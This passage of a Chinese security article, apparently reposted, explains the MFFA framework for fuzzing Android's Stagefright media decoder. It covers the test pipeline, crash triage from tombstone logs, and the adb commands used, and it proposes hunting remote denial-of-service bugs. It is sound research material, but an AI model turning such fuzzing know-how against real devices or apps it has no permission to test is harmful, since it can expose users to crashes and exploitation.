Basicnbsp;Fuzzingnbsp;Frameworknbsp;(BFF) /li /ul ul li FuzzBox /li /ul ul li Radamsa /li /ul ul li Americannbsp;Fuzzynbsp;Lopnbsp;(AFL)nbsp;（推荐） /li /ul ul li Seednbsp;gatheringnbsp;（利用Google语法收集视频链接并下载/利用现成的视频文件库如http://samples.mplayerhq.hu/） /li /ul p style="text-indent:2em;" strong（4）Fuzzing测试流程/strong /p p style="text-indent:2em;" lt;1gt;后端布署服务器运行测试文件生成工具保存测试数据 /p p style="text-indent:2em;" lt;2gt;服务发送大量测试cases到本地主机 /p p style="text-indent:2em;" lt;3gt;主机自动分配测试文件到连接的Android设备上 /p p style="text-indent:2em;" lt;4gt;每个Android设备以分布式方式接收测试文件并分别记录结果 /p p style="text-indent:2em;" strong（5）结果整理模块/strong /p p style="text-indent:2em;" stronglt;1gt;第一次运行阶段/strong /p p style="text-indent:2em;" gt;在设备中运行测试case /p p style="text-indent:2em;" gt;记录每次运行过程中创建的log日志 /p p style="text-indent:2em;" stronglt;2gt;分类阶段/strong /p p style="text-indent:2em;" gt;生成的日志被用于分析标记发生Crash的测试case /p p style="text-indent:2em;" gt;重新测试发生了Crash的case /p p style="text-indent:2em;" gt;之前没有检测到的Crash将存储在独立的issuesnbsp;pool /p p style="text-indent:2em;" stronglt;3gt;筛选阶段/strong /p p style="text-indent:2em;" 保存异常信息的目录主要位于data/tombstones和data/system/dropbox，通过分析这些日志可以定位相关存在问题的Native层so文件的问题代码大概位置。 /p p style="text-indent:2em;" 1.解析log日志文件确认该case造成了Crash /p p style="text-indent:2em;" 2.重新发送文件以测试Infrastructure /p p style="text-indent:2em;" 3.对于发送的每个文件： /p p style="text-indent:2em;" a.获取生成的tombstone文件 /p p style="text-indent:2em;" b.解析tombstone文件然后获取PC值 /p p style="text-indent:2em;" c.检测PC值是否之前遇到过 /p p style="text-indent:2em;" d.如果是新的PC寄存器值，保存相应的tombstone日志文件 /p p style="text-indent:2em;" 4.最后每个issues保存在独立编号的文件夹 /p p style="text-indent:2em;" 如下图是某次Crash日志截图，nbsp;signalnbsp;11（nbsp;SIGSEGV）是在Linux信号中表示无效的内存引用，如下是存在问题的PC寄存器值及详情： /p p style="text-indent:2em;" a href="https://lcx.cc/file/old/4726_3.jpg" target="_blank"img title="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" alt="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" src="https://lcx.cc/file/old/4726_3.jpg" width="780" height="306" //a /p p style="text-indent:2em;" strong0x04关键代码/strong /p p style="text-indent:2em;" 整个框架的实现其实比较简洁，关键代码都是使用python的subprocess模块实现子进程管理，获取从adb接口返回的管道信息。这里仅列出相关adb命令： /p p style="text-indent:2em;" 1.adbnbsp;logatnbsp;-c /p p style="text-indent:2em;" 在开始测试清除设备之前生成的logcat日志 /p p style="text-indent:2em;" 2.adbnbsp;logcatnbsp;-vnbsp;timenbsp;*:Fnbsp;gt;logs/测试文件名+_stagefright+设备名 /p p style="text-indent:2em;" 保存当前case运行过程中的log日志到指定文件夹 /p p style="text-indent:2em;" 3.adbnbsp;shellnbsp;stagefrightnbsp;-snbsp;-anbsp;/data/Music/ /p p style="text-indent:2em;" adbnbsp;shellnbsp;stagefrightnbsp;-rnbsp;/data/Movies/ /p p style="text-indent:2em;" 调用stagefright的命令行工具对/data/Music文件夹的测试文件进行解码 /p p style="text-indent:2em;" -s参数是优先使用software软解码 /p p style="text-indent:2em;" -r参数是强制使用Hardware硬解码 /p p style="text-indent:2em;" -a参数表示解码的是audio音频文件 /p p style="text-indent:2em;" 4.adbnbsp;shellnbsp;stagefrightnbsp;-p /p p style="text-indent:2em;" 列出当前的解码器配置 /p p style="text-indent:2em;" 5.adbnbsp;shellnbsp;stagefrightnbsp;-l /p p style="text-indent:2em;" 列出当前的组件 /p p style="text-indent:2em;" 6.adbnbsp;pushnbsp;/batch/file1nbsp;/data/Music/ /p p style="text-indent:2em;" Push测试⽂件到设备指定目录 /p p style="text-indent:2em;" 7.adbnbsp;shellnbsp;lognbsp;-pnbsp;Fnbsp;-tnbsp;Stagefrightnbsp;-sp_stagefrightnbsp;‘****”+当前任务序号+”-nbsp;Filename:’”+ /p p style="text-indent:2em;" 当前测试文件名 /p p style="text-indent:2em;" 在测试设备的log日志中以指定格式插入一条log日志用于标识当前任务序号开始位置 /p p style="text-indent:2em;" 8.adbnbsp;pullnbsp;/data/tombstones/tombstone_00+tombname /p p style="text-indent:2em;" 抓取发生异常的日志 /p p style="text-indent:2em;" strong0x05测试运用/strong /p p style="text-indent:2em;" 1.在对ZIMPERIUM(Stagefright漏洞发现者所在公司)公布的POC视频进行测试后发现，所有测试视频都能被检测出存在问题。 /p p style="text-indent:2em;" img title="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" alt="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" src="https://lcx.cc/file/old/4727_4.jpg" width="632" height="836" / /p p style="text-indent:2em;" 2.使用框架的筛选功能 /p p style="text-indent:2em;" img title="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" alt="MFFA：Android多媒体文件漏洞Fuzzing框架分析与测试" src="https://lcx.cc/file/old/4728_5.jpg" width="635" height="749" / /p p style="text-indent:2em;" strong0x06二次开发/strong /p p style="text-indent:2em;" 1.目标与用途： /p p style="text-indent:2em;" 打造高效智能的自动化Fuzzer工具，用于对Android系统自带组件，及种各种应用进行安全测试，以发掘潜在的安全漏洞。 /p p style="text-indent:2em;" 2.案例： /p p style="text-indent:2em;" 对Android市场中的浏览器视频解码功能进行fuzzing测试发掘可能导致的crash，对Googlenbsp;ANDROID系统自带的短信应用进行fuzzing测试发掘可能导致远程拒绝服务的漏洞。 /p p style="text-indent:2em;" 原文地址：a href="http://www.droidsec.cn/mffa-android%e5%a4%9a%e5%aa%92%e4%bd%93%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9efuzzing%e6%a1%86%e6%9e%b6%e5%88%86%e6%9e%90%e4%b8%8e%e6%b5%8b%e8%af%95/" target="_blank"http://www.droidsec.cn/mffa-android%e5%a4%9a%e5%aa%92%e4%bd%93%e6%96%87%e4%bb%b6%e6%bc%8f%e6%b4%9efuzzing%e6%a1%86%e6%9e%b6%e5%88%86%e6%9e%90%e4%b8%8e%e6%b5%8b%e8%af%95//a /p pstrong留言评论（旧系统）：/strong/p div style="max-height:600px;width:100%;overflow:auto;overflow-x:hidden;" blockquote id="7800,4560,119.123.111.86" p佚名 @ 2015-08-20 12:06:49/p p style="text-indent:2em"核总，求个邀请码 t0ols@qq.com/p p本站回复：/p p style="text-indent:2em"没有邀请码。/p /blockquote /div